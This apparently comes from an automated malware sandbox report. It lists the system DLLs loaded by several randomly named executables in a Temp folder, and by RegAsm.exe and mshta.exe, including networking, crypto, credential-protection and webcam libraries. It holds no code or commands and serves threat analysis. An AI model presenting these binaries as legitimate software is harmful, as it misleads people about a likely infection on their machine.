Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textinputframework.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: avicap32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvfw32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll
